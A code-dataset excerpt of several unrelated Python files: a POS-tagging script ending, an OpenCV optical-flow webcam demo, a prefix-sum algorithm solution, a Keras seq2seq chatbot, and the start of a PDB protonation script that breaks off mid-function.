src_verb_list[i][0] = i # keep the line number for future sorting\n src_verb_list[i][1] = pos_tokens[1][0] # match or not\n src_verb_list[i][2] = pos_tokens[1][1] # token position\n src_verb_list[i][3] = pos_tokens[1][2] # token\n src_verb_list[i][4] = pos_tokens[1][3] # pos attribute\n src_adj_list[i][0] = i # keep the line number for future sorting\n src_adj_list[i][1] = pos_tokens[2][0] # match or not\n src_adj_list[i][2] = pos_tokens[2][1] # token position\n src_adj_list[i][3] = pos_tokens[2][2] # token\n src_adj_list[i][4] = pos_tokens[2][3] # pos attribute\n\n # delete the no-match record in the token list\n for i in range(total_lines):\n if i % 3000 == 0:\n print(datetime.datetime.now(), 'delete no-match records, line:', i)\n if src_noun_list[total_lines - 1 - i][1] < 0:\n src_noun_list.pop(total_lines - 1 - i)\n if src_verb_list[total_lines - 1 - i][1] < 0:\n src_verb_list.pop(total_lines - 1 - i)\n if src_adj_list[total_lines - 1 - i][1] < 0:\n src_adj_list.pop(total_lines - 1 - i)\n # shuffle the list and get the first \"n\" of the token list\n list_length = len(src_noun_list)\n if list_length > total_process_lines:\n print('noun list larger than ratio')\n print(list_length)\n random.shuffle(src_noun_list)\n for i in range(list_length - total_process_lines):\n src_noun_list.pop(list_length - 1 - i)\n list_length = len(src_verb_list)\n if list_length > total_process_lines:\n print('verb list larger than ratio')\n print(list_length)\n random.shuffle(src_verb_list)\n for i in range(list_length - total_process_lines):\n src_verb_list.pop(list_length - 1 - i)\n list_length = len(src_adj_list)\n if list_length > total_process_lines:\n print('src list larger than ratio')\n print(list_length)\n random.shuffle(src_adj_list)\n for i in range(list_length - total_process_lines):\n src_adj_list.pop(list_length - 1 - i)\n # sort the remaining token list using line number\n print(datetime.datetime.now(), 'sorting noun list')\n src_noun_list.sort(key=lambda x: x[0])\n print(datetime.datetime.now(), 'sorting verb list')\n src_verb_list.sort(key=lambda x: x[0])\n print(datetime.datetime.now(), 'sorting adj list')\n src_adj_list.sort(key=lambda x: x[0])\n print('line number after sorting: source xxx')\n print('noun list', len(src_noun_list))\n print(src_noun_list)\n print('verb list', len(src_verb_list))\n print(src_verb_list)\n print('adj list', len(src_adj_list))\n print(src_adj_list)\n\n # process ( insert tags) the source and target text file\n # process the source text\n pos_process_src(source_txt_rd, source_txt_wr, src_noun_list, src_verb_list, src_adj_list)\n print('finish processing!')\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"CW-tag.py","file_name":"CW-tag.py","file_ext":"py","file_size_in_byte":11778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"628506203","text":"import numpy as np\nimport cv2\nimport time\nimport random\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 854)\ncap.set(4, 480)\n#cap.set(3, 1280)\n#cap.set(4, 720)\n\n\n# params for ShiTomasi corner detection\nfeature_params = dict( maxCorners = 100,\n qualityLevel = 0.3,\n minDistance = 7,\n blockSize = 7 )\n\n# params for lucas kanade optical flow\nlk_params = dict( winSize = (15,15),\n maxLevel = 2,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n\n# red values\ncolor = (0, 0, 255)\n\ncolorList = [ color, (1, 0, 255), (0, 1, 255) ]\n\nfor j in range(1, 30):\n for k in range(1, 30):\n colorList.append( (j, k, 255) )\n\nlower = np.array([17, 15, 100])\nupper = np.array([50, 56, 255])\n\n# Take first frame and find corners in it\nret, old_frame = cap.read()\nold_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)\np0 = cv2.goodFeaturesToTrack(old_gray, mask = None, **feature_params)\n\n# Create a mask image for drawing purposes\nmask = np.zeros_like(old_frame)\n\n#timer\ntimer = time.time()\n\n\nwhile(1):\n #new corners every xxx seconds\n if time.time() - timer > 30:\n mask = np.zeros_like(old_frame)\n timer = time.time()\n\n ret,frame = cap.read()\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # calculate optical flow\n p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)\n\n if p1 is not None:\n # Select good points\n good_new = p1[st==1]\n good_old = p0[st==1]\n else:\n #find some new features\n ret, old_frame = cap.read()\n old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)\n p0 = cv2.goodFeaturesToTrack(old_gray, mask = None, **feature_params)\n p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)\n good_new = p1[st==1]\n good_old = p0[st==1]\n\n # draw the tracks\n for i,(new,old) in enumerate(zip(good_new,good_old)):\n a,b = new.ravel()\n c,d = old.ravel()\n mask = cv2.line(mask, (a,b),(c,d), random.choice(colorList), 30)\n # mask = cv2.line(mask, (a,b),(c,d), color, 30)\n\n # add optical mask\n img = cv2.add(frame,mask)\n\n # red mask\n redMask = cv2.inRange(img, lower, upper)\n\n img = cv2.bitwise_and(img, img, mask = redMask)\n # img = cv2.bitwise_and(img, img, mask = 255 - redMask)\n \n cv2.namedWindow(\"flow\", cv2.WND_PROP_FULLSCREEN)\n cv2.setWindowProperty(\"flow\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n cv2.imshow(\"flow\",img)\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\n # Now update the previous frame and previous points\n old_gray = frame_gray.copy()\n p0 = good_new.reshape(-1,1,2)\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"ICAM_FINAL/redOneCh.py","file_name":"redOneCh.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"365312171","text":"#-*- encoding: utf-8 -*-\nimport sys\nr=sys.stdin.readline\n\nN,M = map(int,r().split()) # 영토의 범위 (N x M)\n\npopulation = {0:[0]*(M+1), 1:[0]} # 1,1에서 N', M'까지 살고있는 사람들의 누적 합을 저장할 배열\n\nfor i in map(int,r().split()): # 첫 줄은 그냥 누적합을 넣는다.\n population[1].append(population[1][-1] + i)\n \nfor i in range(2, N+1): # 두 번째 줄 부터는 1,1부터 해당 칸까지 누적 합을 계산하여 넣는다.\n population[i] = [0]\n row_list = [0] + list(map(int,r().split()))\n \n for j in range(1, M+1):\n population[i].append(row_list[j] + population[i][j-1] + population[i-1][j] - population[i-1][j-1])\n \n\nK = int(r()) # 진경 대왕이 인구수를 궁금해하는 직사각형 범위 개수 \n\nfor quest in range(K):\n x1, y1, x2, y2 = map(int,r().split()) # x1, y1부터 x2, y2까지\n total = 0 # 사는 인구 수 합계\n \n total = population[x2][y2] - population[x2][y1-1] - population[x1-1][y2] + population[x1-1][y1-1]\n \n print(total)\n","sub_path":"Algorithm/Baekjoon/15724 주지수/15724.py","file_name":"15724.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"71347495","text":"from tensorflow.keras.utils import to_categorical\r\nfrom tensorflow.keras import Input, Model\r\nfrom tensorflow.keras.layers import Embedding, LSTM, Dense, TimeDistributed, Bidirectional, Concatenate\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\nfrom tensorflow.keras.optimizers import Adam\r\nimport numpy as np\r\nimport pandas as pd\r\nimport sys\r\nimport preprocessing_functions as pp\r\n\r\n\r\n\r\nif len(sys.argv) != 2:\r\n print(\"Incorrect number of arguments. Please use -train or -talk argument to specify the mode\")\r\n sys.exit()\r\nelif sys.argv[1] != \"-train\" and sys.argv[1] != \"-talk\":\r\n print(\"Incorrect argument. Please use -train or -talk argument to specify the mode\")\r\n sys.exit()\r\n\r\n\r\n########################################\r\n##### DATA LOADING #####\r\n########################################\r\n\r\n# We load the files containing all the questions and answers\r\nquestions = open('questions.txt', 'r', encoding = 'utf-8', errors = 'ignore').read()\r\nanswers = open('answers.txt', 'r', encoding = 'utf-8', errors = 'ignore').read()\r\nquestions = questions.split('\\n')\r\nanswers = answers.split('\\n')\r\n\r\n# We limit the number of questions and answers due to memory issue\r\ndown = 30000\r\nup = 85000\r\nquestions = questions[down:up]\r\nanswers = answers[down:up]\r\n\r\n\r\n\r\n#########################################\r\n##### PREPROCESSING #####\r\n#########################################\r\n\r\n# We clean all the questions and answers\r\n# by removing the abbreviations and punctuations\r\nquestions = pp.cleaner(questions)\r\nanswers = pp.cleaner(answers)\r\n\r\n# We remove the too long questions and answers\r\n# these could causes trouble during training\r\nquestions, answers = pp.length_filter(questions, answers, 15, 14)\r\nprint(\"Number of questions: {}\".format(len(questions)))\r\nprint(\"Number of answers: {}\".format(len(answers)))\r\n\r\n# We add the special tokens and to the answers.\r\nanswers = pp.start_end_adder(answers)\r\n\r\n# We build the token vocabulary\r\nvocab_size = 3876\r\nvocab_size = vocab_size + 3 # to take the special tokens into account that are not part of the words stats\r\ntokenizer = pp.vocab_builder(questions + answers, vocab_size, oov_token='unk', number=False)\r\ntokenizer.word_index = {e:i for e,i in tokenizer.word_index.items() if i <= vocab_size}\r\nvocab_size = len(tokenizer.word_index) + 1 # one more to take the PAD token (0) into account\r\nprint('Vocabulary size : {}'.format(vocab_size))\r\n\r\n\r\n# Stats to determine the threshold used for word filtration (Tokenizer) \r\nTH = 6\r\nnb_total_words = 1\r\nocc_total_words = 0\r\nnb_word_less_TH = 0\r\nocc_word_less_TH = 0\r\nfor i, (word, count) in enumerate(tokenizer.word_counts.items()):\r\n if word != 'bos' and word != 'eos':\r\n occ_total_words += count\r\n nb_total_words += 1\r\n if count < TH:\r\n occ_word_less_TH += count\r\n nb_word_less_TH += 1\r\n\r\nprint(\"Number of words: {}\".format(nb_total_words))\r\nprint(\"Number of words with less than {} occurences: {}\".format(TH, nb_word_less_TH))\r\nprint(\"Percentage of words with less than {} occurences: {}%\".format(TH, round((occ_word_less_TH/occ_total_words)*100, 3)))\r\nprint(\"Resulting: {}\".format(nb_total_words-nb_word_less_TH))\r\n\r\n\r\n# We tokenize the questions and the answers\r\ntokenized_questions = tokenizer.texts_to_sequences(questions)\r\ntokenized_answers = tokenizer.texts_to_sequences(answers)\r\n\r\n# We determine the maximum lengths\r\nmax_q_length = max([len(x) for x in tokenized_questions])\r\nprint(\"Maximum length of questions: {}\".format(max_q_length))\r\nmax_a_length = max([len(x) for x in tokenized_answers])\r\nprint(\"Maximum length of answers: {}\".format(max_a_length))\r\n\r\n\r\n\r\nif sys.argv[1] == \"-train\":\r\n \r\n # We apply padding to each questions and answers to get the encoder & decoder inputs\r\n encoder_input = pp.padder(tokenized_questions, max_length=max_q_length)\r\n decoder_input = pp.padder(tokenized_answers, max_length=max_a_length)\r\n \r\n # We create the decoder targets by removing special tokens , by applying\r\n # padding and finally by converting each word in an one-hot encoding\r\n for i in range(len(tokenized_answers)):\r\n tokenized_answers[i] = tokenized_answers[i][1:]\r\n padded_answers = pp.padder(tokenized_answers, max_a_length)\r\n decoder_target = to_categorical(padded_answers, num_classes=vocab_size)\r\n\r\n\r\n\r\n#########################################\r\n##### HYPERPARAMETERS #####\r\n#########################################\r\n\r\nHIDDEN_DIM = 128\r\nLOSS_FUNCTION = 'categorical_crossentropy'\r\nLEARNING_RATE = 0.001\r\nBATCH_SIZE = 32\r\nEPOCHS = 150\r\nDROPOUT = 0.5\r\n\r\n\r\n\r\n#########################################\r\n##### Pre-Trained GloVe Embedding #####\r\n#########################################\r\n\r\n# We load the whole embedding into memory\r\nembeddings_index = {}\r\nwith open('glove.6B.100d.txt', encoding='utf-8') as f:\r\n for line in f:\r\n values = line.split()\r\n word = values[0]\r\n coefs = np.asarray(values[1:], dtype='float32')\r\n embeddings_index[word] = coefs\r\n\r\n# we create a matrix of one embedding for each word in the training dataset\r\nembedding_matrix = np.zeros((vocab_size, 100))\r\nfor word, i in tokenizer.word_index.items():\r\n\tembedding_vector = embeddings_index.get(word)\r\n\tif embedding_vector is not None:\r\n\t\tembedding_matrix[i] = embedding_vector\r\n\r\n# We create the embedding layer\r\nembedding_layer = Embedding(input_dim=vocab_size, output_dim=100, trainable=True)\r\nembedding_layer.build((None,))\r\nembedding_layer.set_weights([embedding_matrix])\r\n\r\n\r\n\r\n##########################################\r\n##### SEQ2SEQ TRAINING #####\r\n##########################################\r\n\r\n# --- Encoder part ---\r\n# We instantiate keras tensor\r\nencoder_inputs = Input(shape=(max_q_length,))\r\n# We create an embedding layer that will convert word index into dense vector of fixed size (hidden_dim)\r\nencoder_embedding = embedding_layer(encoder_inputs)\r\n# We create 3 stacked Long Short-Term Memory layer\r\n# The LSTM layer return output, hidden state and cell state\r\nencoder_LSTM_1 = Bidirectional(LSTM(units=HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT))\r\nencoder_output_1, forward_encoder_h_1, forward_encoder_c_1, backward_encoder_h_1, backward_encoder_c_1 = encoder_LSTM_1(encoder_embedding)\r\nencoder_h_1 = Concatenate()([forward_encoder_h_1, backward_encoder_h_1])\r\nencoder_c_1 = Concatenate()([forward_encoder_c_1, backward_encoder_c_1])\r\n\r\nencoder_LSTM_2 = Bidirectional(LSTM(units=HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT))\r\nencoder_output_2, forward_encoder_h_2, forward_encoder_c_2, backward_encoder_h_2, backward_encoder_c_2 = encoder_LSTM_2(encoder_output_1)\r\nencoder_h_2 = Concatenate()([forward_encoder_h_2, backward_encoder_h_2])\r\nencoder_c_2 = Concatenate()([forward_encoder_c_2, backward_encoder_c_2])\r\n\r\nencoder_LSTM_3 = Bidirectional(LSTM(units=HIDDEN_DIM, return_state=True, return_sequences=False, dropout=DROPOUT))\r\n_, forward_encoder_h_3, forward_encoder_c_3, backward_encoder_h_3, backward_encoder_c_3 = encoder_LSTM_3(encoder_output_2)\r\nencoder_h_3 = Concatenate()([forward_encoder_h_3, backward_encoder_h_3])\r\nencoder_c_3 = Concatenate()([forward_encoder_c_3, backward_encoder_c_3])\r\nencoder_states = [encoder_h_1, encoder_c_1, encoder_h_2, encoder_c_2, encoder_h_3, encoder_c_3]\r\n\r\n# --- Decoder part ---\r\n# We instantiate keras tensor\r\ndecoder_inputs = Input(shape=(max_a_length,))\r\n# We create an embedding layer that will convert word index into dense vector of fixed size (hidden_dim)\r\ndecoder_embedding = embedding_layer(decoder_inputs)\r\n# We create 3 stacked Long Short-Term Memory layer\r\n# The LSTM layer return output, hidden state and cell state\r\ndecoder_LSTM_1 = LSTM(units=2*HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT)\r\ndecoder_output_1, decoder_h_1, decoder_c_1 = decoder_LSTM_1(decoder_embedding, initial_state=[encoder_h_1, encoder_c_1])\r\ndecoder_LSTM_2 = LSTM(units=2*HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT)\r\ndecoder_output_2, decoder_h_2, decoder_c_2 = decoder_LSTM_2(decoder_output_1, initial_state=[encoder_h_2, encoder_c_2])\r\ndecoder_LSTM_3 = LSTM(units=2*HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT)\r\ndecoder_output_3, decoder_h_3, decoder_c_3 = decoder_LSTM_3(decoder_output_2, initial_state=[encoder_h_3, encoder_c_3])\r\n# We connect the decoder to the final fully connected layer (called densed layer)\r\ndense_layer = TimeDistributed(Dense(vocab_size, activation='softmax'))\r\noutputs = dense_layer(decoder_output_3)\r\n\r\n# We put the encoder and decoder together to form the seq2seq model\r\nmodel = Model([encoder_inputs, decoder_inputs], outputs)\r\n# We build and config the training seq2seq model\r\nopt = Adam(learning_rate=LEARNING_RATE)\r\nmodel.compile(optimizer=opt, loss=LOSS_FUNCTION, metrics=['accuracy'])\r\nmodel.summary()\r\n\r\n\r\n\r\nif sys.argv[1] == \"-train\":\r\n \r\n ########################################\r\n ##### TRAINING #####\r\n ########################################\r\n\r\n # We train the network and save the weights\r\n history = model.fit([encoder_input, decoder_input], \r\n decoder_target,\r\n validation_split=0.2,\r\n batch_size=BATCH_SIZE, \r\n epochs=EPOCHS, \r\n shuffle=True)\r\n\r\n # We save the weights\r\n model.save('weights_{}_{}_adam_3layers_GLOVE_100_BiDir.h5'.format(EPOCHS, BATCH_SIZE))\r\n\r\n # We save the history of the training\r\n history_df = pd.DataFrame(history.history)\r\n with open('training_history_{}_{}_adam_3layers_GLOVE_100_BiDir.csv'.format(EPOCHS, BATCH_SIZE), 'w') as h_csv:\r\n history_df.to_csv(h_csv)\r\n print(\"weights and training data have been saved.\")\r\n\r\n\r\nelif sys.argv[1] == \"-talk\":\r\n \r\n # If we just want to talk with the chatbot, we load the weights\r\n model = model.load_weights('weights_{}_{}_adam_3layers_GLOVE_100_BiDir.h5'.format(EPOCHS, BATCH_SIZE))\r\n print(\"Model has been uploaded.\")\r\n \r\n \r\n \r\n ###########################################\r\n ##### SEQ2SEQ INFERRING #####\r\n ###########################################\r\n # In this case we have two separate models because the encoder states will be feed to the decoder only\r\n # at the first time step. After that, the first word generated by the decoder and the corresponding cell\r\n # state and hidden state are given as input to the decoder itself and so on. \r\n\r\n # --- Encoder part ---\r\n # We create the encoder model which will produce the first states used by the decoder\r\n encoder_model = Model(encoder_inputs, encoder_states)\r\n encoder_model.summary()\r\n\r\n # --- Decoder part ---\r\n # We instantiate the Keras tensor. The states that will be given to the decoder\r\n decoder_input_h_1 = Input(shape=(2*HIDDEN_DIM,))\r\n decoder_input_c_1 = Input(shape=(2*HIDDEN_DIM,))\r\n decoder_input_h_2 = Input(shape=(2*HIDDEN_DIM,))\r\n decoder_input_c_2 = Input(shape=(2*HIDDEN_DIM,))\r\n decoder_input_h_3 = Input(shape=(2*HIDDEN_DIM,))\r\n decoder_input_c_3 = Input(shape=(2*HIDDEN_DIM,))\r\n decoder_states_inputs = [decoder_input_h_1, decoder_input_c_1, \r\n decoder_input_h_2, decoder_input_c_2,\r\n decoder_input_h_3, decoder_input_c_3]\r\n # The LSTM layers return output, hidden state and cell state\r\n decoder_output, h_1, c_1 = decoder_LSTM_1(decoder_embedding, initial_state=decoder_states_inputs[:2])\r\n decoder_output, h_2, c_2 = decoder_LSTM_2(decoder_output, initial_state=decoder_states_inputs[2:4])\r\n decoder_output, h_3, c_3 = decoder_LSTM_3(decoder_output, initial_state=decoder_states_inputs[-2:])\r\n decoder_states = [h_1, c_1, h_2, c_2, h_3, c_3]\r\n # We connect the decoder to the final fully connected layer (called densed layer)\r\n outputs = dense_layer(decoder_output)\r\n # We create the decoder model\r\n decoder_model = Model([decoder_inputs] + decoder_states_inputs, [outputs] + decoder_states)\r\n decoder_model.summary()\r\n \r\n \r\n \r\n ############################################\r\n ##### CHATBOT LOOP #####\r\n ############################################\r\n \r\n # Fucntion to convert the format user's input sequences\r\n def converter(sentence):\r\n sentence = pp.cleaning(sentence)\r\n words = sentence.split()\r\n tokens_seq = []\r\n for word in words:\r\n result = tokenizer.word_index.get(word, '')\r\n if result != '':\r\n tokens_seq.append(result)\r\n return pad_sequences([tokens_seq],\r\n maxlen=max_q_length,\r\n padding='post')\r\n \r\n \r\n for _ in range(100):\r\n states_values = encoder_model.predict(converter(input('Enter question : ')))\r\n \r\n # start with a target sequence of size 1 containing the special token 'bos' \r\n target_seq = np.zeros((1, 1)) # one line, one column\r\n target_seq[0, 0] = tokenizer.word_index['bos']\r\n \r\n flag = False\r\n translated_sentence = ''\r\n \r\n while not flag:\r\n # We give the one-word target sequence (special token ) and\r\n # the states vectors produced by the encoder to the decoder to\r\n # allow it to produce a prediction for the next word of the sequence.\r\n o, h1, c1, h2, c2, h3, c3 = decoder_model.predict([target_seq] + states_values)\r\n \r\n predicted_word_index = np.argmax(o[0, -1, :])\r\n predicted_word = None\r\n \r\n # We look for the word in our dictionary and stop the process if the\r\n # special token is produced or if the maximum length of answer\r\n # is exceeded\r\n for word, index in tokenizer.word_index.items():\r\n if predicted_word_index == index:\r\n if word != 'eos':\r\n translated_sentence += ' {}'.format(word)\r\n predicted_word = word\r\n \r\n if predicted_word == 'eos' or len(translated_sentence.split()) > max_a_length:\r\n flag = True\r\n \r\n # We prepare the next iteration\r\n target_seq = np.zeros((1, 1))\r\n target_seq[0, 0] = predicted_word_index\r\n states_values = [h1, c1, h2, c2, h3, c3]\r\n \r\n print(translated_sentence)\r\n","sub_path":"chatbot_try_3layers_BiDir.py","file_name":"chatbot_try_3layers_BiDir.py","file_ext":"py","file_size_in_byte":14532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"181621900","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# run with protonation: gen_syst1.py qm.tex pdb P\n# run without protonation: gen_syst1.py qm.tex pdb \n\n## program to automatise teh generation \n#of the syst1 file for quantum refinment\n\n\nimport time\n## set timer\ntime_start = time.time()\nimport sys\n##load mandatory modules\nimport numpy as np\n#import numpy as np\nprint(sys.argv)\nif len(sys.argv)>=2:\n mm3_input=sys.argv[1]\n print(\"read from line 1\")\nelse:\n mm3_input=\"mm3.pdb\"\n\n\nif len(sys.argv)>=3:\n input_pdb=sys.argv[2]\n print(\"read from line 2\")\nelse:\n input_pdb=\"pdb\"\n\n\nout_file=\"comqum.pdb\"\n\n\n\ndef read_pdb(input_pdb):\n## reads in pdb coordinates hardcodedt\n##https://zhanglab.ccmb.med.umich.edu/BindProfX/pdb_atom_format.html\n##COLUMNS DATA TYPE CONTENTS\n##--------------------------------------------------------------------------------\n ##1 - 6 Record name \"ATOM \"\n## 7 - 11 Integer Atom serial number.\n##13 - 16 Atom Atom name.\n##17 Character Alternate location indicator.\n##18 - 20 Residue name Residue name.\n##22 Character Chain identifier.\n##23 - 26 Integer Residue sequence number.\n##27 AChar Code for insertion of residues.\n##31 - 38 Real(8.3) Orthogonal coordinates for X in Angstroms.\n##39 - 46 Real(8.3) Orthogonal coordinates for Y in Angstroms.\n##47 - 54 Real(8.3) Orthogonal coordinates for Z in Angstroms.\n##55 - 60 Real(6.2) Occupancy.\n##61 - 66 Real(6.2) Temperature factor (Default = 0.0).\n##73 - 76 LString(4) Segment identifier, left-justified.\n##77 - 78 LString(2) Element symbol, right-justified.\n##79 - 80 LString(2) Charge on the atom.\n print(\" read pdb file\")\n read_pdb = open(input_pdb, \"r\")\n org_pdb =[]\n work_pdb =[]\n f_head=False\n head=[]\n for line in read_pdb:\n idef = line[0:6].strip()\n if idef==\"ATOM\" or idef==\"HETATM\":\n f_head=True\n l_pdb=[]\n a = line[0:6].strip()\n a_num = int(line[6:11].strip())\n a_name = line[12:16].strip()\n alter = line[16].strip()\n res_name= line[17:20].strip()\n chain = line[21].strip()\n res_num = int(line[22:26].strip())\n inser = line[26].strip()\n x = float(line[30:38].strip())\n y = float(line[38:46].strip())\n z = float(line[46:54].strip())\n occ = float(line[54:60].strip())\n b_fac = float(line[60:66].strip())\n seg_i = line[72:76].strip()\n ele = line[76:78].strip()\n charge = line[78:80].strip()\n\n l_pdb.append(a)\n l_pdb.append(a_num)\n l_pdb.append(a_name)\n l_pdb.append(alter)\n l_pdb.append(res_name)\n l_pdb.append(chain)\n l_pdb.append(res_num)\n l_pdb.append(inser)\n l_pdb.append(x)\n l_pdb.append(y)\n l_pdb.append(z)\n l_pdb.append(occ)\n l_pdb.append(b_fac)\n l_pdb.append(seg_i)\n l_pdb.append(ele)\n l_pdb.append(charge)\n#[0, 1 , 2 , 3 , 4 , 5 , 6, , 7 , 8, 9,10\n#[a, a_num, a_name, alter, res_name, chain, res_num, inser, x, y, z\n#11 , 12 , 13 , 14 , 15\n#occ, b_fac, seg_i, ele, charge]\n org_pdb.append(l_pdb)\n work_pdb.append(l_pdb)\n# print(l_pdb)\n if f_head==False:\n head.append(line)\n print(\"close file:\", input_pdb)\n return org_pdb, work_pdb, head\n\n\ndef read_pdb_from_mimic(input_pdb):\n## reads in pdb coordinates hardcodedt\n##https://zhanglab.ccmb.med.umich.edu/BindProfX/pdb_atom_format.html\n##COLUMNS DATA TYPE CONTENTS\n##--------------------------------------------------------------------------------\n ##1 - 6 Record name \"ATOM \"\n## 7 - 11 Integer Atom serial number.\n##13 - 16 Atom Atom name.\n##17 Character Alternate location indicator.\n##18 - 20 Residue name Residue name.\n##22 Character Chain identifier.\n##23 - 26 Integer Residue sequence number.\n##27 AChar Code for insertion of residues.\n##31 - 38 Real(8.3) Orthogonal coordinates for X in Angstroms.\n##39 - 46 Real(8.3) Orthogonal coordinates for Y in Angstroms.\n##47 - 54 Real(8.3) Orthogonal coordinates for Z in Angstroms.\n##55 - 60 Real(6.2) Occupancy.\n##61 - 66 Real(6.2) Temperature factor (Default = 0.0).\n##73 - 76 LString(4) Segment identifier, left-justified.\n##77 - 78 LString(2) Element symbol, right-justified.\n##79 - 80 LString(2) Charge on the atom.\n print(\" read pdb file\")\n read_pdb = open(input_pdb, \"r\")\n org_pdb =[]\n work_pdb =[]\n f_head=False\n head=[]\n for line in read_pdb:\n idef = line[0:6].strip()\n if idef==\"ATOM\" or idef==\"HETATM\":\n f_head=True\n l_pdb=[]\n a_num = int(line[6:11].strip())\n a_name = line[12:16].strip()\n x = float(line[30:38].strip())\n y = float(line[38:46].strip())\n z = float(line[46:54].strip())\n\n l_pdb.append(a_num)\n l_pdb.append(a_name)\n l_pdb.append(x)\n l_pdb.append(y)\n l_pdb.append(z)\n#[0, 1 , 2, 3, 4 \n#[ a_num, a_name, x, y, z\n work_pdb.append(l_pdb)\n print(\"close file:\", input_pdb)\n return work_pdb\n\ndef len3dvec(vec):\n## calculates lengh of a 3D vecor\n## input as list\n a = np.sqrt(vec[0]**2 + vec[1]**2 + vec[2]**2)\n return a\n\n\ndef atm_to_res(pdb_read):\n# sort pdb in residues\n pdb=[]\n pdb.append([pdb_read[0]])\n for i in range(1,len(pdb_read)):\n if pdb_read[i][6] != pdb_read[i-1][6]:\n# print(len(pdb))\n pdb.append([pdb_read[i]])\n if pdb_read[i][6] == pdb_read[i-1][6]:\n pdb[len(pdb)-1].append(pdb_read[i])\n\n return pdb\n\ndef proto_qm(pdb,atom_qm,f_p):\n# protonates qm system if protons are not existing\n# print(\"protonate syst1\")\n if f_p== False:\n return pdb\n print(\"protonate syst1\")\n for i in range(len(atom_qm)):\n# print(\"protonate syst1\")\n\n# print(atom_qm[i])\n xyz=[atom_qm[i][8],atom_qm[i][9],atom_qm[i][10]]\n# print(xyz)\n ele=atom_qm[i][14]\n# print(ele)\n# print(atom_qm[i])\n if ele==\"C\":\n pdb=prot_c(pdb,xyz,ele,atom_qm[i])\n if ele==\"N\":\n pdb=prot_n(pdb,xyz,ele,atom_qm[i])\n if ele==\"O\":\n pdb=prot_o(pdb,xyz,ele,atom_qm[i])\n return pdb\n\ndef prot_n(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n if 1.5< n_bonds <= 2.5 and len(bond_atom)==2:\n pdb= ad_NH_s(pdb,bond_atom[0],bond_atom[1],atom_qm)\n return pdb\n if n_bonds==1 and len(bond_atom)==1:\n pdb=ad_NH2(pdb,bond_atom[0],atom_qm)\n return pdb\n return pdb\n\n\ndef ad_NH2(pdb, A2, A3):\n# ad 2H as NH2 group to A3\n# print(\"¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\")\n r = 1.012\n Ad = 120\n Dd = 180\n Dd1 = 0\n A1=find_A1(pdb,A3,A2) \n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd1)\n nam=list(A3[2])\n name = str(nam[0])\n\n name1 = \"H1\"+name\n name2 = \"H2\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n\n return pdb\n\n\n\n\n\n\n\ndef ad_NH_s(pdb, A1, A2, A3):\n# ad H as NH (SP2) group to A3\n# print(\"atoms treatet\")\n# print(\"A3\",A3)\n# print(\"A2\",A2)\n# print(\"A1\",A1)\n r = 1.032\n Ad = 120\n Dd = 180\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[0]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"H\"+name\n\n# print(\"name1\",name1)\n# print(adH1)\n# print(A3)\n# print(\"next step ad to pdb\")\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n# print(\"addet to pdb\")\n# print(\"&&&&&&&&&&&&&&&TEST&&&&&&&&&&&&\")\n return pdb\n\n\ndef prot_o(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n# print(\"atom_qm\",n_bonds,len(bond_atom), atom_qm)\n# if atom_qm[4]==\"HOH\":\n# print(bond_atom)\n if n_bonds >= 2:\n return pdb\n if n_bonds==1 and len(bond_atom)==1:\n pdb=ad_OH(pdb,bond_atom[0],atom_qm)\n if n_bonds==0 and atom_qm[4]==\"HOH\":\n pdb = ad_OH_water(pdb,atom_qm)\n return pdb\n\n\ndef ad_OH_water(pdb,atom_qm):\n## protonates water in direction of posible hydrogen bonds\n print(atom_qm)\n l_vdw=vdw()\n 